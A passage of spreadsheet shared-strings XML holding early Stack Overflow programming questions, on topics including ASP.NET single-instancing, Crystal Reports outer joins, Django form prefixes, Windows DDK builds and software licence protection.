    <t>How do I "single-instance" an ASP.Net AJAX web portal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™ve been asked if we can optionally â€œsingle-instanceâ€ our web portal.  See
&lt;a href="http://www.hanselman.com/blog/TheWeeklySourceCode31SingleInstanceWinFormsAndMicrosoftVisualBasicdll.aspx" rel="nofollow"&gt;this post on Hanselman's blog&lt;/a&gt; for the same idea in a WinForms app.&lt;/p&gt;
&lt;p&gt;Suppose we have 2 shortcuts on the same client machine:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://MyServer/MyWebPortal/Default.aspx?user=username&amp;amp;document=Foo" rel="nofollow"&gt;http://MyServer/MyWebPortal/Default.aspx?user=username&amp;amp;document=Foo&lt;/a&gt;
&lt;a href="http://MyServer/MyWebPortal/Default.aspx?user=username&amp;amp;document=Bar" rel="nofollow"&gt;http://MyServer/MyWebPortal/Default.aspx?user=username&amp;amp;document=Bar&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Clicking on the first shortcut would launch our web portal, log in, and display the document â€œFooâ€.  Clicking on the second shortcut should display the document â€œBarâ€ in the running instance of the web portal.&lt;/p&gt;
&lt;p&gt;My current approach is this:  In the Page Load, for the first instance create a per-client Application variable.  The second instance looks for the Application variable to see if the portal is running on the client.  If it is, the second URL is recorded in another Application variable and the second instance is  forcibly exited.  Iâ€™ve tried creating a ASP.Net AJAX Timer to poll the Application variable for a document to display.  This sort of works.  In order to respond quickly to the second request Iâ€™ve set the Timer interval to 2 seconds.  This makes the portal irritating to use because of the frequent postbacks.&lt;/p&gt;
&lt;p&gt;Using my approach, is there a way for the second instance to notify the first instance to check the application variable without polling?  Is there a better overall approach to this problem?&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why use LabVIEW?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am learning to use LabVIEW as part of my honours project, and was wondering what benefits the graphical programming language has over a textual one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I specify values in a properties file so they can be retrieved using ResourceBundle#getStringArray?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use &lt;code&gt;ResourceBundle#getStringArray&lt;/code&gt; to retrieve a &lt;code&gt;String[]&lt;/code&gt; from a properties file. The description of this method in the documentation reads:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Gets a string array for the given key from this resource bundle or one of its parents.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;However, I have attempted to store the values in the properties file as multiple individual key/value pairs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;key=value1
key=value2
key=value3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and as a comma-delimited list:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;key=value1,value2,value3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but neither of these is retrievable using &lt;code&gt;ResourceBundle#getStringArray&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How do you represent a set of key/value pairs in a properties file such that they can be retrieved using &lt;code&gt;ResourceBundle#getStringArray&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your favorite User Interface? (web application)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think it would be interesting to get a programmers viewpoint on UI design.&lt;/p&gt;
&lt;p&gt;What is your favorite User Interface that you have come across in a web application?&lt;/p&gt;
&lt;p&gt;If possible, say a little bit about why you like it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse class version bug</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In eclipse 3.4 I'm trying to do some performance tests on a large product, one of the included libraries is the vecmath.jar (javax.vecmath package) from the Java3D project.  Everything was working fine and then when trying to run it yesterday I get this exception/error not long after starting it up:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.lang.UnsupportedClassVersionError: javax/vecmath/Point2f (Unsupported major.minor version 49.0)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which I believe means that I'm trying to load a java 1.5 class file into a 1.4 jvm which is unsupported.  However when I went to the class file to check this I saw this in the eclipse class file viewer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Compiled from Point2f.java (version 1.2 : 46.0, super bit)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So the class loader says it is version 49.0 but the class file says its 46.0.  I've tried cleaning and fully rebuilding the project, I've confirmed that the compiler version for the project is 1.4, the JRE is 1.4 and for the run configuration the 1.4 jvm is selected.  I'm totally stuck on this, does anyone have any idea what might be causing this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;===EDIT===&lt;/p&gt;
&lt;p&gt;It turns out that a version of java3d which was incompatible with java 1.4.2 had been installed in C:\Program Files\java\j2re1.4.2_18\lib\ext.  I installed a newer version of Java3D to play around with in java6 and i guess it installed the libs in all my JREs even the ones which were incompatible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to make Crystal Reports include a constant in a join condition, without using a SQL command object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What I want to do is an outer join to a table, where I exclude records from the joined table based on matching a constant, however keep records from the main table. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT a.id, a.other, b.baz
FROM a
LEFT OUTER JOIN b
  ON a.id  = b.id
  AND b.bar = 'foo'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Expected results:&lt;/p&gt;
&lt;pre&gt;
    id  other       baz      
    --  ----------  -------  
    1   Has foo     Include  
    2   Has none    (null)   
    3   Has foobar  (null)   
&lt;/pre&gt;
&lt;p&gt;I can't get the same results by putting it in the filter condition. If I use the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT a.id, a.other, b.baz
FROM a
LEFT OUTER JOIN b
  ON a.id  = b.id
WHERE (b.bar IS NULL OR b.bar = 'foo')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get these incorrect results:&lt;/p&gt;
&lt;pre&gt;
    id  other     baz      
    --  --------  -------  
    1   Has foo   Include  
    2   Has none  (null)   
&lt;/pre&gt;
&lt;p&gt;Where it excluded records of A that happen to match a record of B where bar = 'foobar'. I don't want that, I want A to be present, but B to be nulls in that case.&lt;/p&gt;
&lt;p&gt;Table B will have multiple records that need excluding, so I don't think I can filter this on the Crystal side without doing a lot of messing around to avoid problems from duplicate records from table A.&lt;/p&gt;
&lt;p&gt;I cannot use a SQL command object, as the third party application that we are running the reports from seems to choke on SQL command objects.&lt;/p&gt;
&lt;p&gt;I cannot use views, as our support contract does not permit database modifications, and our vendor considers adding views a database modification.&lt;/p&gt;
&lt;p&gt;I am working with Crystal Reports XI, specifically version 11.0.0.895. In case it makes a difference, I am running against a Progress 9.1E04 database using the SQL-92 ODBC driver.&lt;/p&gt;
&lt;p&gt;The sample tables and data used in the examples can be created with the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE a (id INTEGER, other VARCHAR(32));
CREATE TABLE b (id INTEGER, bar VARCHAR(32), baz VARCHAR(32));
insert into A (id, other) values ('1', 'Has foo');
insert into A (id, other) values ('2', 'Has none');
insert into A (id, other) values ('3', 'Has foobar');
insert into B (id, bar, baz) values ('1', 'foo', 'Include');
insert into B (id, bar, baz) values ('1', 'foobar', 'Exclude');
insert into B (id, bar, baz) values ('1', 'another', 'Exclude');
insert into B (id, bar, baz) values ('1', 'More', 'Exclude');
insert into B (id, bar, baz) values ('3', 'foobar', 'Exclude');
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What TFS tool would you recommend?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am mostly use to using Subversion for my source control. However, my current position has me using TFS. The UI of the TFS explorer and its integration with Visual Studio has me a little disoriented. I miss having tools like SmartSVN where I could see at a glance what I've modified and is pending checkin.&lt;/p&gt;
&lt;p&gt;What tool sets do you recommend for use with TFS in general, and what tools do you know of that enable such visualizations? I know that the TFS explorer will show you pending checkins, but I miss having a separate tool that monitors file system changes and auto refreshes the list of files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do PHP stream contexts do in relation to file operations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the PHP manual, the file operations reference an optional context (e.g. for &lt;a href="http://us3.php.net/copy" rel="nofollow"&gt;copy&lt;/a&gt;).  How do these contexts affect basic file operations?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for an OSX application that can do image processing using a webcam</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for an OSX (or Linux?) application that can recieve data from a webcam/video-input and let you do some image processing on the pixels in something similar to c or python or perl, not that bothered about the processing language.&lt;/p&gt;
&lt;p&gt;I was considering throwing one together but figured I'd try and find one that exists already first before I start re-inventing the wheel.&lt;/p&gt;
&lt;p&gt;Wanting to do some experiments with object detection and reading of dials and numbers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Attribute to trigger an event on invoking a method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in C# or .NET in general to create an attribute on a method which triggers an event when a method is invoked? Ideally, I would be able to run custom actions before and after the invocation of the method.&lt;/p&gt;
&lt;p&gt;I mean something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[TriggersMyCustomAction()]
public void DoSomeStuff()
{
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am totally clueless how to do it or if it possible at all, but &lt;a href="http://msdn.microsoft.com/en-us/library/system.diagnostics.conditionalattribute.aspx"&gt;System.Diagnostic.ConditionalAttribute&lt;/a&gt; might do a similar thing in the background. I am not sure though.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: I forgot to mention that due to the circumstances of my specific case, performance is not really an issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Semi-Tricky SQL Query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a query for SQL Server 2005 but I can't figure out how to do it.  I have a table with the following fields:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MessageID int&lt;br/&gt;
CategoryID int&lt;br/&gt;
Priority tinyint&lt;br/&gt;
MessageText NVARCHAR(MAX)&lt;br/&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I need a query that will return * for each row that has the highest priority within a Category.  For example, if I had the following data:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MessageID, CategoryID, Priority, MessageText&lt;/strong&gt;&lt;br/&gt;
1, 100, 1, Error #1234 occurred&lt;br/&gt;
2, 100, 2, Error #243 occurred&lt;br/&gt;
3, 100, 3, Error #976 occurred&lt;br/&gt;
4, 200, 4, Error #194 occurred&lt;br/&gt;
5, 200, 1, Error #736 occurred&lt;br/&gt;
6, 300, 3, Error #54 occurred&lt;br/&gt;
7, 300, 2, Error #888 occurred&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;then the result would be:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MessageID, CategoryID, Priority, MessageText&lt;/strong&gt;&lt;br/&gt;
3, 100, 3, Error #976 occurred&lt;br/&gt;
4, 200, 4, Error #194 occurred&lt;br/&gt;
6, 300, 3, Error #54 occurred&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;Notice that it returns one row per category, and that it is the row which had the highest priority for that Category.&lt;/p&gt;
&lt;p&gt;Can anyone tell me how I can write this query?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django Forms - How to Use Prefix Parameter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have a form like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class GeneralForm(forms.Form):
    field1 = forms.IntegerField(required=False)
    field2 = forms. IntegerField(required=False)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I want to show it twice on a page within one form tag each time with a different prefix e.g.,:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rest of page ...
&amp;lt;form ..&amp;gt;
GeneralForm(data,prefix="form1").as_table()
GeneralForm(data,prefix="form2").as_table()
&amp;lt;input type="submit" /&amp;gt;
&amp;lt;/form&amp;gt;
rest of page ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When the user submits this, how do I get the submitted form back into two separate forms to do validation, and redisplay it?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://docs.djangoproject.com/en/dev/ref/forms/api/#prefixes-for-forms"&gt;This was the only documentation&lt;/a&gt; I could find and it's peckish.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best tool for build automation for a one-man software shop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building Windows apps for a few clients.  I read Joel on Software and took the Joel Test and realized I don't quite measure up.  One place I am lacking is automated builds.  What should I use to have automated builds?  I have Windows apps that use .NET 1.1, 2.0, and 3.5.  Also, I need to be able to build my .vdproj to create MSI's.  I am looking for something that is free and would work well for a one-man team.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Migrating Java UNO code from OpenOffice 2.4 to 3.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had a nifty small tool written to convert spreadsheets to plain text.
Since it was my private hacker tool, it relied on OpenOffice 2.x to read the files.&lt;/p&gt;
&lt;p&gt;But when I installed &lt;strong&gt;OpenOffice 3&lt;/strong&gt; and tried to get it get it to run, I failed miserably, because I'm either missing some JAR files or half the classes have been replaced.&lt;/p&gt;
&lt;p&gt;I'm including all five JAR files from URE/Java (URE: &lt;a href="http://en.wikipedia.org/wiki/Universal_Network_Objects" rel="nofollow"&gt;UNO&lt;/a&gt; 
Runtime Environment, a subset of OpenOffice.org hosting and 
managing UNO components) and am still missing these classes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;com.sun.star.frame.XComponentLoader
com.sun.star.frame.XController
com.sun.star.frame.XDesktop
com.sun.star.frame.XModel
com.sun.star.frame.XStorable
com.sun.star.sheet.XSpreadsheet
com.sun.star.sheet.XSpreadsheetDocument
com.sun.star.sheet.XSpreadsheetView
com.sun.star.text.XTextDocument
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any pointers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Convert.ToDouble(string) round?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example, Convert.ToDouble("0.1234567890123456789") = 0.123456789012346&lt;/p&gt;
&lt;p&gt;What is the maximum number of significant figures?  Couldn't find it in the docs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight 2 UI pattern</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to build small (for now) admin app in Silverlight2, and would like to use some pattern for binding UI with my BL/DAL.&lt;br /&gt;
I found view-model-viewmodel and mvp/mvc patterns, where first one (V/M/VM) is specially suited for WPF apps, because it uses rich capabilities of WPF data-binding options. What do you suggest? Can you write simple example of V/M/VM for SL2?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Error when compiling with Windows DDK</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Forgive me for being a complete newbie with Windows DDK.&lt;/p&gt;
&lt;p&gt;I have create a simple file named &lt;code&gt;test.cpp&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;windows.h&amp;gt;
#define BAD_ADDRESS 0xBAADF00D
int __cdecl main(int argc, char* args[])
{
    char* p =(char*)BAD_ADDRESS;
    *p='A';
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the same directory I created a &lt;code&gt;sources&lt;/code&gt; file like this:&lt;/p&gt;
&lt;pre&gt;
TARGETNAME=test
TARGETTYPE=PROGRAM
TARGETPATH=obj
TARGETLIBS=$(SDK_LIB_PATH)\kernel32.lib 
SOURCES= test.cpp
&lt;/pre&gt;
&lt;p&gt;And a &lt;code&gt;makefile&lt;/code&gt; like this:&lt;/p&gt;
&lt;pre&gt;
#
# DO NOT EDIT THIS FILE!!!  Edit .\sources. if you want to add a new source
# file to this component.  This file merely indirects to the real make file
# that is shared by all the components of Windows
#
!INCLUDE $(NTMAKEENV)\makefile.def
&lt;/pre&gt;
&lt;p&gt;After launching the Windows XP Free Build Environment I browse to the directory with the three files (test.cpp, makefile and sources) and run the following command:&lt;/p&gt;
&lt;pre&gt;F:\temp\debug\dir1&gt;build -cZg&lt;/pre&gt;
Which outputs:
&lt;pre&gt;
BUILD: Adding /Y to COPYCMD so xcopy ops won't hang.
BUILD: Using 2 child processes
BUILD: Object root set to: ==&gt; objfre_wxp_x86
BUILD: Compile and Link for i386
BUILD: Examining f:\temp\debug\dir1 directory for files to compile.
BUILD: Compiling (NoSync) f:\temp\debug\dir1 directory
1&gt;Compiling - test.cpp for i386
BUILD: Compiling  f:\temp\debug\dir1 directory
BUILD: Linking f:\temp\debug\dir1 directory
1&gt;Linking Executable - objfre_wxp_x86\i386\test.exe for i386
BUILD: Done
    2 files compiled
    1 executable built
&lt;/pre&gt;
&lt;p&gt;The problem is that when I run the created executable &lt;code&gt;test.exe&lt;/code&gt; it says:&lt;/p&gt;
&lt;pre&gt;
F:\temp\debug\dir1\objfre_wxp_x86\i386&gt;test
The F:\temp\debug\dir1\objfre_wxp_x86\i386\test.exe application cannot be run in Win32 mode.
&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;What am I missing here?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you compile flex in Visual Studio 2005/2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't figure this one out.  I can download a win32 binary of flex 2.5.4a from gnuwin32, but I'd like to build the latest version (2.5.35) using Visual Studio 2005.  I suppose I could build in in cygwin, but where is the fun in that?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://flex.sourceforge.net/" rel="nofollow"&gt;http://flex.sourceforge.net/&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to sanity check a date in java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find it curious that the most obvious way to create Date objects in Java has been deprecated and appears to have been "substituted" with not so obvious to use lenient calendar. So...&lt;/p&gt;
&lt;p&gt;How do you check that a date given as a combination of day, month and year is a valid date? For instance a date 2008-02-31 (as in yyyy-mm-dd) would be invalid date. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the  best open source game to learn from?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;This question has been preserved for historical reasons, but it is not
  considered on-topic, so don't use it as an excuse to post something
  similar.&lt;/p&gt;
  &lt;p&gt;More info at &lt;a href="http://stackoverflow.com/faq"&gt;http://stackoverflow.com/faq&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;p&gt;For me to read code and learn, not to play...&lt;/p&gt;
&lt;p&gt;...of course ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google Maps API - GMarker.openInfoWindowHtml() stopped working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Google Map that suddenly stopped working for no apparent reason (I hadn't touched the code for months, but the wrapper code from our CMS may have changed without Corporate telling me).&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.democratandchronicle.com/section/builder" rel="nofollow"&gt;http://www.democratandchronicle.com/section/builder&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;(sorry about the nasty HTML outside the map, most of that comes from our corporate parent...)&lt;/p&gt;
&lt;p&gt;I've narrowed it down to this part of my &lt;code&gt;drawMarker&lt;/code&gt; function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GEvent.addListener(marker, 'click', function() {
  marker.openInfoWindowHtml(html, { maxWidth: 500 });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Of note:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;alert(html);&lt;/code&gt; displays the correct HTML for the infowindow.&lt;/li&gt;
&lt;li&gt;The HTML in the html variable is indeed valid.&lt;/li&gt;
&lt;li&gt;The click event is firing (confirmed by &lt;code&gt;alert('test');&lt;/code&gt; within it)&lt;/li&gt;
&lt;li&gt;Another map I host on the same site &lt;a href="http://www.democratandchronicle.com/garagesales" rel="nofollow"&gt;works fine&lt;/a&gt;, despite similar code.&lt;/li&gt;
&lt;li&gt;No JavaScript errors in Firebug or IE that I can see.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I've been bashing my head against this for a while. What am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it acceptable to "borrow" dependency properties from unrelated classes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a class that renders some content in WPF, and I want to give the user control over how the content is rendered.  The rendering is mostly stroking lines, so I decided to look to the System.Windows.Forms.Shapes.Line class to get an idea of what properties I might want to implement.  This led me to implement most of the &lt;code&gt;StrokeXXXX&lt;/code&gt; properties, and it's a lot of drudgework since each requires metadata to affect the rendering.&lt;/p&gt;
&lt;p&gt;A colleague suggested that I just "borrow" the properties from Shape like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Shape.StrokeThicknessProperty.AddOwner(typeof(MyType));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems like a pretty good idea.  I thought that by doing this I'd lose the ability to set coercion and property changed callbacks, but it looks like the overload that takes a PropertyMetadata allows this.  The only downside I can see is if the implementation of Shape changes, it will affect our class, but I'm uncertain how often I expect the .NET interfaces to change significantly.&lt;/p&gt;
&lt;p&gt;What do you think? Is this a decent shortcut to defining properties when a well-known class has the behavior you want and a stable interface, or a sure-fire way to play with fire while in a gasoline bath?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate returns invalid results with composite key</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting the strangest results. I have a class with a composite key.
If i do the following query:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;from LOVEJB l order by l.canonicalId
  desc&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;my results are not ordered by the '&lt;strong&gt;canonicalId&lt;/strong&gt;' column I asked for. Instead, the canonical id result is like:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;823 823 822 823 ,,,&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Can someone give me some pointers on how should I try to crack this? I already messed up with &lt;em&gt;hashcodes&lt;/em&gt; and &lt;em&gt;equals&lt;/em&gt;, I experimented with a new class, etc. to no avail.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Speech Recognition - Is this what the user said?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have need to write an application which uses a speech recognition engine -- either the built in vista one, or a third party one -- that can display a word or phrase, and recognise when the user reads it (or an approximation of it).  I also need to be able to switch quickly between languages, without changing the language of the operating system.&lt;/p&gt;
&lt;p&gt;The users will be using the system for very short periods.  The application needs to work without the requirement of first training the recognition engine to the users' voices.&lt;/p&gt;
&lt;p&gt;It would also be fantastic if this could work on Windows XP or lesser versions of Windows Vista.&lt;/p&gt;
&lt;p&gt;Optionally, the system needs to be able to read information on the screen back to the user, in the user's selected language.  I can work around this specification using pre-recorded voice-overs, but the preferred method would be to use a text-to-speech engine.&lt;/p&gt;
&lt;p&gt;Can anyone recommend something for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find number of lines changed between CVS versions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've spent most of the day making what are basically some housekeeping changes to the codebase of one of our projects (replacing all &lt;code&gt;System.out.println()&lt;/code&gt; calls with log4j).&lt;/p&gt;
&lt;p&gt;I'm kind of curious how many lines of code I've updated with this set of changes.&lt;/p&gt;
&lt;p&gt;Is there anyway with &lt;code&gt;cvs diff&lt;/code&gt; or another command to get an accurate count of how many lines have changed?&lt;/p&gt;
&lt;p&gt;I've tried&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cvs diff -b -B -R
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to get all of the changes in the working directory (and recursively the subdirectories), but for each file changed it also prints out file/version information, which makes just counting the lines of output useless.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio Solution Explorer Locks Up</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an issue with Visual Studio 2005 w/ TFS where, from time to time, the Solution Explorer will stop responding to interaction.  Instead it does the beep, like I'm trying to click on a parent window with a modal dialog visible, but there isn't one.  The only thing I've found to do so far, is to restart VS, but that's kind of a pain because our solution is rather large.  And it's not even a guarantee... it might happen again when I load the solution.&lt;/p&gt;
&lt;p&gt;I was curious if anyone else has had this problem and knows of a better solution that restarting VS until it goes away.&lt;/p&gt;
&lt;p&gt;[Edit: 6-11-2010] I've since moved over to VS 2008 and haven't had this problem since.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Software protection by encryption</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For our software we use hardware dongles to protect the software. No protection is perfect but this commercial solution is affordable and keeps honest people honest (as mentioned in another thread). The advantage is the 128 bit key that is stored 'unreadable' on the hardware dongle. &lt;/p&gt;
&lt;p&gt;We want to remove this hardware dongle and start using software protection. Basically we can use a commercial product, but on the other hand that won't be unbreakable either. I don't know much about encryption and that's why I am posting this. How do I store a key on a Windows computer that will not be possible to read by using Reflector or something else? However I should be able to access the key for testing the license code.&lt;/p&gt;
&lt;p&gt;I would just like a simple solution that can't be hacked by simply using Reflector.&lt;/p&gt;
&lt;p&gt;Or am I asking a very stupid question?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thank you all for your very fast and useful replies. I don't want to use licensing over the internet, since the application is running not always on computers that are connected. I will then get probably more problems then solving them. We will now most probably go for a commercial solution. It seems that protection is not that trivial. &lt;/p&gt;
&lt;p&gt;Thanks a lot!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practice for a collection of generic classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Consider the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;abstract class SomeClassX&amp;lt;T&amp;gt;
{
  // blah
}
class SomeClassY: SomeClassX&amp;lt;int&amp;gt;
{
  // blah
}
class SomeClassZ: SomeClassX&amp;lt;long&amp;gt;
{
  // blah
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want a collection of SomeClassX&amp;lt;T&amp;gt;'s, however, this isn't possible since SomeClassX&amp;lt;int&amp;gt; != SomeClassX&amp;lt;long&amp;gt; and List&amp;lt;SomeClassX&amp;lt;&amp;gt;&amp;gt; isn't allowed.&lt;/p&gt;
&lt;p&gt;So my solution is to have SomeClassX&amp;lt;T&amp;gt; implement an interface and define my collection as, where ISomeClassX is the interface:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class CollectionOfSomeClassX: List&amp;lt;ISomeClassX&amp;gt;
{
  // blah
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this the best way to do this, or is there better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suggestions to improve VB.NET URL shortener?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is my function (&lt;strong&gt;updated&lt;/strong&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Shared Function shortenUrl(ByVal URL As String) As String
    Return shortenUrl(URL, 32)
End Function
Public Shared Function shortenUrl(ByVal URL As String, ByVal maxLength As Integer) As String
    If URL.Length &amp;gt; maxLength Then
        String.Format("{0}...{1}", URL.Substring(0, (maxLength / 2)), URL.Substring(URL.Length - ((maxLength / 2) - 3)))
    Else
        Return URL
    End If
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I fixed the problem where it didn't return &lt;code&gt;maxLength&lt;/code&gt; chars because it didn't take into account the ellipses.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;It seems to me that it is too complicated; any suggestions, comments, concerns are more than welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Select Box onClick - Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Rails application that in the erb code, I use a select box. What I would like to do is reload the page passing the sort parameter. My controller already handles it, but I don't know how to reload the page with the selected value from my select box. Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% @options = {:latest =&amp;gt; 'lastest' , :alphabetical =&amp;gt; 'alphabetical', :pricelow =&amp;gt; 'price-low', :pricehigh =&amp;gt;'pricehigh'} %&amp;gt;
&amp;lt;%= select_tag 'sort[]', options_for_select(@options), :include_blank =&amp;gt; true,:onchange =&amp;gt; "location.reload('location?sort='+this.value)"%&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Simple Search: Passing Form Variable to URI Using CodeIgniter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a search form on each of my pages. If I use form helper, it defaults to &lt;code&gt;$_POST&lt;/code&gt;. I'd like the search term to show up in the URI:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://example.com/search/KEYWORD
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've been on Google for about an hour, but to no avail. I've only found articles on how &lt;code&gt;$_GET&lt;/code&gt; is basically disabled, because of the native URI convention. I can't be the first person to want this kind of functionality, am I? Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSTL, Beans, and method calls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a JSP where I need to call methods on object that come from a Bean. The previous version of the page does not use JSTL and it works properly. My new version has a set up like this:&lt;/p&gt;
